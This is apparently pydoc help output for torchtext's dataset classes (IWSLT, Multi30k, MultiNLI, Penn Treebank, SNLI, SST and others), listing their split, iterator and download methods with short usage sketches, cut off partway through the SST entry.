| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class IWSLT(TranslationDataset)
| IWSLT(path, exts, fields, **kwargs)
|
| The IWSLT 2016 TED talk translation task
|
| Method resolution order:
| IWSLT
| TranslationDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| splits(exts, fields, root='.data', train='train', validation='IWSLT16.TED.tst2013', test='IWSLT16.TED.tst2014', **kwargs) from builtins.type
| Create dataset objects for splits of the IWSLT dataset.
|
| Arguments:
| exts: A tuple containing the extension to path for each language.
| fields: A tuple containing the fields that will be used for data
| in each language.
| root: Root dataset storage directory. Default is '.data'.
| train: The prefix of the train data. Default: 'train'.
| validation: The prefix of the validation data. Default: 'val'.
| test: The prefix of the test data. Default: 'test'.
| Remaining keyword arguments: Passed to the splits method of
| Dataset.
|
| ----------------------------------------------------------------------
| Static methods defined here:
|
| clean(path)
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| base_dirname = '{}-{}'
|
| base_url = 'https://wit3.fbk.eu/archive/2016-01//texts/{}/{}/{}.tgz'
|
| name = 'iwslt'
|
| ----------------------------------------------------------------------
| Methods inherited from TranslationDataset:
|
| __init__(self, path, exts, fields, **kwargs)
| Create a TranslationDataset given paths and fields.
|
| Arguments:
| path: Common prefix of paths to the data files for both languages.
| exts: A tuple containing the extension to path for each language.
| fields: A tuple containing the fields that will be used for data
| in each language.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Static methods inherited from TranslationDataset:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class LanguageModelingDataset(torchtext.data.dataset.Dataset)
| LanguageModelingDataset(path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
|
| Defines a dataset for language modeling.
|
| Method resolution order:
| LanguageModelingDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __init__(self, path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
| Create a LanguageModelingDataset given a path and a field.
|
| Arguments:
| path: Path to the data file.
| text_field: The field that will be used for text data.
| newline_eos: Whether to add an <eos> token for every newline in the
| data file. Default: True.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| splits(path=None, root='.data', train=None, validation=None, test=None, **kwargs) from builtins.type
| Create Dataset objects for multiple splits of a dataset.
|
| Arguments:
| path (str): Common prefix of the splits' file paths, or None to use
| the result of cls.download(root).
| root (str): Root dataset storage directory. Default is '.data'.
| train (str): Suffix to add to path for the train set, or None for no
| train set. Default is None.
| validation (str): Suffix to add to path for the validation set, or None
| for no validation set. Default is None.
| test (str): Suffix to add to path for the test set, or None for no test
| set. Default is None.
| Remaining keyword arguments: Passed to the constructor of the
| Dataset (sub)class being used.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if provided.
|
| ----------------------------------------------------------------------
| Data and other attributes inherited from torchtext.data.dataset.Dataset:
|
| sort_key = None
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
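
The constructor above can wrap any plain-text corpus as a single token stream. A minimal sketch under the legacy `torchtext.data` Field API (the file name `corpus.txt` and the batch/BPTT sizes are placeholders, not part of the documentation above):

from torchtext import data, datasets

# One text field; the default tokenizer is whitespace splitting.
TEXT = data.Field(lower=True)

# Wrap a local plain-text file as one long stream of tokens.
lm_dataset = datasets.LanguageModelingDataset(
    path="corpus.txt", text_field=TEXT, newline_eos=True)

TEXT.build_vocab(lm_dataset)

# BPTTIterator chunks the stream into (text, target) batches for language modeling.
train_iter = data.BPTTIterator(lm_dataset, batch_size=32, bptt_len=35)
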
class Multi30k(TranslationDataset)
| Multi30k(path, exts, fields, **kwargs)
|
| The small-dataset WMT 2016 multimodal task, also known as Flickr30k
|
| Method resolution order:
| Multi30k
| TranslationDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| splits(exts, fields, root='.data', train='train', validation='val', test='test2016', **kwargs) from builtins.type
| Create dataset objects for splits of the Multi30k dataset.
|
| Arguments:
| exts: A tuple containing the extension to path for each language.
| fields: A tuple containing the fields that will be used for data
| in each language.
| root: Root dataset storage directory. Default is '.data'.
| train: The prefix of the train data. Default: 'train'.
| validation: The prefix of the validation data. Default: 'val'.
|             test: The prefix of the test data. Default: 'test2016'.
| Remaining keyword arguments: Passed to the splits method of
| Dataset.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = ''
|
| name = 'multi30k'
|
| urls = ['http://www.quest.dcs.shef.ac.uk/wmt16_files_mmt/training.tar....
|
| ----------------------------------------------------------------------
| Methods inherited from TranslationDataset:
|
| __init__(self, path, exts, fields, **kwargs)
| Create a TranslationDataset given paths and fields.
|
| Arguments:
| path: Common prefix of paths to the data files for both languages.
| exts: A tuple containing the extension to path for each language.
| fields: A tuple containing the fields that will be used for data
| in each language.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Static methods inherited from TranslationDataset:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
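
A hedged usage sketch for the splits classmethod above (the special tokens, min_freq, and batch size are arbitrary choices; the archive is downloaded into root on first use):

from torchtext import data, datasets

SRC = data.Field(lower=True, init_token="<sos>", eos_token="<eos>")
TRG = data.Field(lower=True, init_token="<sos>", eos_token="<eos>")

# German -> English: exts picks the file extensions, fields the matching Fields.
train, valid, test = datasets.Multi30k.splits(
    exts=(".de", ".en"), fields=(SRC, TRG))

SRC.build_vocab(train, min_freq=2)
TRG.build_vocab(train, min_freq=2)

train_iter, valid_iter, test_iter = data.BucketIterator.splits(
    (train, valid, test), batch_size=64)
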
class MultiNLI(NLIDataset)
| MultiNLI(path, format, fields, skip_header=False, csv_reader_params={}, **kwargs)
|
 |     The Multi-Genre Natural Language Inference (MultiNLI) corpus, loaded from JSON lines files.
|
| Method resolution order:
| MultiNLI
| NLIDataset
| torchtext.data.dataset.TabularDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| splits(text_field, label_field, parse_field=None, genre_field=None, root='.data', train='multinli_1.0_train.jsonl', validation='multinli_1.0_dev_matched.jsonl', test='multinli_1.0_dev_mismatched.jsonl') from builtins.type
 |         Create dataset objects for splits of the MultiNLI dataset.
|
| This is the most flexible way to use the dataset.
|
| Arguments:
| text_field: The field that will be used for premise and hypothesis
| data.
| label_field: The field that will be used for label data.
| parse_field: The field that will be used for shift-reduce parser
| transitions, or None to not include them.
| extra_fields: A dict[json_key: Tuple(field_name, Field)]
| root: The root directory that the dataset's zip archive will be
| expanded into.
 |             train: The filename of the train data.
 |                 Default: 'multinli_1.0_train.jsonl'.
 |             validation: The filename of the validation (matched dev) data, or
 |                 None to not load it. Default: 'multinli_1.0_dev_matched.jsonl'.
 |             test: The filename of the test (mismatched dev) data, or None to
 |                 not load it. Default: 'multinli_1.0_dev_mismatched.jsonl'.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'multinli_1.0'
|
| name = 'multinli'
|
| urls = ['http://www.nyu.edu/projects/bowman/multinli/multinli_1.0.zip'...
|
| ----------------------------------------------------------------------
| Class methods inherited from NLIDataset:
|
| iters(batch_size=32, device=0, root='.data', vectors=None, trees=False, **kwargs) from builtins.type
 |         Create iterator objects for splits of the MultiNLI dataset.
|
| This is the simplest way to use the dataset, and assumes common
| defaults for field, vocabulary, and iterator parameters.
|
| Arguments:
| batch_size: Batch size.
| device: Device to create batches on. Use -1 for CPU and None for
| the currently active GPU device.
| root: The root directory that the dataset's zip archive will be
 |                 expanded into; therefore the directory in whose multinli_1.0
| subdirectory the data files will be stored.
| vectors: one of the available pretrained vectors or a list with each
| element one of the available pretrained vectors (see Vocab.load_vectors)
| trees: Whether to include shift-reduce parser transitions.
| Default: False.
| Remaining keyword arguments: Passed to the splits method.
|
| ----------------------------------------------------------------------
| Static methods inherited from NLIDataset:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.TabularDataset:
|
| __init__(self, path, format, fields, skip_header=False, csv_reader_params={}, **kwargs)
| Create a TabularDataset given a path, file format, and field list.
|
| Arguments:
| path (str): Path to the data file.
| format (str): The format of the data file. One of "CSV", "TSV", or
| "JSON" (case-insensitive).
| fields (list(tuple(str, Field)) or dict[str: tuple(str, Field)]:
| If using a list, the format must be CSV or TSV, and the values of the list
| should be tuples of (name, field).
| The fields should be in the same order as the columns in the CSV or TSV
| file, while tuples of (name, None) represent columns that will be ignored.
|
| If using a dict, the keys should be a subset of the JSON keys or CSV/TSV
| columns, and the values should be tuples of (name, field).
| Keys not present in the input dictionary are ignored.
| This allows the user to rename columns from their JSON/CSV/TSV key names
| and also enables selecting a subset of columns to load.
| skip_header (bool): Whether to skip the first line of the input file.
| csv_reader_params(dict): Parameters to pass to the csv reader.
| Only relevant when format is csv or tsv.
| See
| https://docs.python.org/3/library/csv.html#csv.reader
| for more details.
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
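
A sketch of loading MultiNLI via splits (the field choices, vocabulary size, and printed attributes are assumptions; the zip archive is fetched into root on first use):

from torchtext import data, datasets

TEXT = data.Field(lower=True)
LABEL = data.LabelField()

# Returns train plus the matched and mismatched dev sets documented above.
train, dev_matched, dev_mismatched = datasets.MultiNLI.splits(TEXT, LABEL)

TEXT.build_vocab(train, max_size=25000)
LABEL.build_vocab(train)

# Each example exposes 'premise', 'hypothesis' and 'label' attributes.
print(vars(train[0]).keys())
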
class PennTreebank(LanguageModelingDataset)
| PennTreebank(path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
|
| The Penn Treebank dataset.
| A relatively small dataset originally created for POS tagging.
|
| References
| ----------
| Marcus, Mitchell P., Marcinkiewicz, Mary Ann & Santorini, Beatrice (1993).
| Building a Large Annotated Corpus of English: The Penn Treebank
|
| Method resolution order:
| PennTreebank
| LanguageModelingDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| iters(batch_size=32, bptt_len=35, device=0, root='.data', vectors=None, **kwargs) from builtins.type
| Create iterator objects for splits of the Penn Treebank dataset.
|
| This is the simplest way to use the dataset, and assumes common
| defaults for field, vocabulary, and iterator parameters.
|
| Arguments:
| batch_size: Batch size.
| bptt_len: Length of sequences for backpropagation through time.
| device: Device to create batches on. Use -1 for CPU and None for
| the currently active GPU device.
| root: The root directory where the data files will be stored.
| wv_dir, wv_type, wv_dim: Passed to the Vocab constructor for the
| text field. The word vectors are accessible as
| train.dataset.fields['text'].vocab.vectors.
| Remaining keyword arguments: Passed to the splits method.
|
| splits(text_field, root='.data', train='ptb.train.txt', validation='ptb.valid.txt', test='ptb.test.txt', **kwargs) from builtins.type
| Create dataset objects for splits of the Penn Treebank dataset.
|
| Arguments:
| text_field: The field that will be used for text data.
| root: The root directory where the data files will be stored.
| train: The filename of the train data. Default: 'ptb.train.txt'.
| validation: The filename of the validation data, or None to not
| load the validation set. Default: 'ptb.valid.txt'.
| test: The filename of the test data, or None to not load the test
| set. Default: 'ptb.test.txt'.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = ''
|
| name = 'penn-treebank'
|
| urls = ['https://raw.githubusercontent.com/wojzaremba/lstm/master/data...
|
| ----------------------------------------------------------------------
| Methods inherited from LanguageModelingDataset:
|
| __init__(self, path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
| Create a LanguageModelingDataset given a path and a field.
|
| Arguments:
| path: Path to the data file.
| text_field: The field that will be used for text data.
| newline_eos: Whether to add an <eos> token for every newline in the
| data file. Default: True.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Data and other attributes inherited from torchtext.data.dataset.Dataset:
|
| sort_key = None
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
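
The iters shortcut documented above handles download, vocabulary, and batching in one call; a sketch (batch size, BPTT length, and the CPU device are arbitrary choices):

from torchtext import datasets

# device=-1 keeps batches on the CPU, per the docstring above.
train_iter, valid_iter, test_iter = datasets.PennTreebank.iters(
    batch_size=32, bptt_len=35, device=-1)

batch = next(iter(train_iter))
print(batch.text.shape, batch.target.shape)
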
class SNLI(NLIDataset)
| SNLI(path, format, fields, skip_header=False, csv_reader_params={}, **kwargs)
|
 |     The Stanford Natural Language Inference (SNLI) corpus, loaded from JSON lines files.
|
| Method resolution order:
| SNLI
| NLIDataset
| torchtext.data.dataset.TabularDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| splits(text_field, label_field, parse_field=None, root='.data', train='snli_1.0_train.jsonl', validation='snli_1.0_dev.jsonl', test='snli_1.0_test.jsonl') from builtins.type
| Create dataset objects for splits of the SNLI dataset.
|
| This is the most flexible way to use the dataset.
|
| Arguments:
| text_field: The field that will be used for premise and hypothesis
| data.
| label_field: The field that will be used for label data.
| parse_field: The field that will be used for shift-reduce parser
| transitions, or None to not include them.
| extra_fields: A dict[json_key: Tuple(field_name, Field)]
| root: The root directory that the dataset's zip archive will be
| expanded into.
 |             train: The filename of the train data. Default: 'snli_1.0_train.jsonl'.
 |             validation: The filename of the validation data, or None to not
 |                 load the validation set. Default: 'snli_1.0_dev.jsonl'.
 |             test: The filename of the test data, or None to not load the test
 |                 set. Default: 'snli_1.0_test.jsonl'.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'snli_1.0'
|
| name = 'snli'
|
| urls = ['http://nlp.stanford.edu/projects/snli/snli_1.0.zip']
|
| ----------------------------------------------------------------------
| Class methods inherited from NLIDataset:
|
| iters(batch_size=32, device=0, root='.data', vectors=None, trees=False, **kwargs) from builtins.type
| Create iterator objects for splits of the SNLI dataset.
|
| This is the simplest way to use the dataset, and assumes common
| defaults for field, vocabulary, and iterator parameters.
|
| Arguments:
| batch_size: Batch size.
| device: Device to create batches on. Use -1 for CPU and None for
| the currently active GPU device.
| root: The root directory that the dataset's zip archive will be
 |                 expanded into; therefore the directory in whose snli_1.0
| subdirectory the data files will be stored.
| vectors: one of the available pretrained vectors or a list with each
| element one of the available pretrained vectors (see Vocab.load_vectors)
| trees: Whether to include shift-reduce parser transitions.
| Default: False.
| Remaining keyword arguments: Passed to the splits method.
|
| ----------------------------------------------------------------------
| Static methods inherited from NLIDataset:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.TabularDataset:
|
| __init__(self, path, format, fields, skip_header=False, csv_reader_params={}, **kwargs)
| Create a TabularDataset given a path, file format, and field list.
|
| Arguments:
| path (str): Path to the data file.
| format (str): The format of the data file. One of "CSV", "TSV", or
| "JSON" (case-insensitive).
| fields (list(tuple(str, Field)) or dict[str: tuple(str, Field)]:
| If using a list, the format must be CSV or TSV, and the values of the list
| should be tuples of (name, field).
| The fields should be in the same order as the columns in the CSV or TSV
| file, while tuples of (name, None) represent columns that will be ignored.
|
| If using a dict, the keys should be a subset of the JSON keys or CSV/TSV
| columns, and the values should be tuples of (name, field).
| Keys not present in the input dictionary are ignored.
| This allows the user to rename columns from their JSON/CSV/TSV key names
| and also enables selecting a subset of columns to load.
| skip_header (bool): Whether to skip the first line of the input file.
| csv_reader_params(dict): Parameters to pass to the csv reader.
| Only relevant when format is csv or tsv.
| See
| https://docs.python.org/3/library/csv.html#csv.reader
| for more details.
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
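
A sketch of the splits route for SNLI (the GloVe alias is optional and triggers its own download; all field and batch settings here are assumptions):

from torchtext import data, datasets

TEXT = data.Field(lower=True)
LABEL = data.LabelField()

train, dev, test = datasets.SNLI.splits(TEXT, LABEL)

TEXT.build_vocab(train, vectors="glove.6B.100d")  # pretrained vectors are optional
LABEL.build_vocab(train)  # entailment / contradiction / neutral

train_iter, dev_iter, test_iter = data.BucketIterator.splits(
    (train, dev, test), batch_size=128)
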
class SST(torchtext.data.dataset.Dataset)
| SST(path, text_field, label_field, subtrees=False, fine_grained=False, **kwargs)
|
| Defines a dataset composed of Examples along with its Fields.
|
| Attributes:
| sort_key (callable): A key to use for sorting dataset examples for batching
| together examples with similar lengths to minimize padding.
| examples (list(Example)): The examples in this dataset.
| fields (dict[str, Field]): Contains the name of each column or field, together
| with the corresponding Field object. Two fields with the same Field object
| will have a shared vocabulary.
|
| Method resolution order:
| SST
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __init__(self, path, text_field, label_field, subtrees=False, fine_grained=False, **kwargs)
| Create an SST dataset instance given a path and fields.
|
| Arguments:
| path: Path to the data file
| text_field: The field that will be used for text data.
| label_field: The field that will be used for label data.
| subtrees: Whether to include sentiment-tagged subphrases
| in addition to complete examples. Default: False.
| fine_grained: Whether to use 5-class instead of 3-class
| labeling. Default: False.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Class methods defined here:
|
| iters(batch_size=32, device=0, root='.data', vectors=None, **kwargs) from builtins.type
| Create iterator objects for splits of the SST dataset.
|
| Arguments:
 |             batch_size: Batch size.
 |             device: Device to create batches on. Use -1 for CPU and None for
| the currently active GPU device.
| root: The root directory that the dataset's zip archive will be
| expanded into; therefore the directory in whose trees
| subdirectory the data files will be stored.
| vectors: one of the available pretrained vectors or a list with each
| element one of the available pretrained vectors (see Vocab.load_vectors)
| Remaining keyword arguments: Passed to the splits method.
|
| splits(text_field, label_field, root='.data', train='train.txt', validation='dev.txt', test='test.txt', train_subtrees=False, **kwargs) from builtins.type
| Create dataset objects for splits of the SST dataset.
|
| Arguments:
| text_field: The field that will be used for the sentence.
| label_field: The field that will be used for label data.
| root: The root directory that the dataset's zip archive will be
| expanded into; therefore the directory in whose trees
| subdirectory the data files will be stored.
| train: The filename of the train data. Default: 'train.txt'.
| validation: The filename of the validation data, or None to not
| load the validation set. Default: 'dev.txt'.
| test: The filename of the test data, or None to not load the test
| set. Default: 'test.txt'.
| train_subtrees: Whether to use all subtrees in the training set.
| Default: False.
| Remaining keyword arguments: Passed to the splits method of
| Dataset.
|
| ----------------------------------------------------------------------
| Static methods defined here:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'trees'
|
| name = 'sst'
|
| urls = ['http://nlp.stanford.edu/sentiment/trainDevTestTrees_PTB.zip']
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
